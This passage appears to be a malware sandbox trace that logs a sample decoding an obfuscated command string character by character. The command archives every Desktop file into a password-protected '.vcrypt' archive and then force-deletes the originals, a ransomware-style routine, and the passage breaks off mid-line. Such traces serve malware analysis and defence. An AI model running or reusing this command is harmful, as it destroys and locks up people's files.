\"%USERPROFIOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%uvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%ushuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%useuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%userqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%userndph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%usernaph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%usernamh(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_ghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_dhvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_devnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_deskwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktos1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcr|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrysw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\"#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" %(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%UVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USEUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPRRILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFLOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFIOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Dhvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Devnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.491] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir 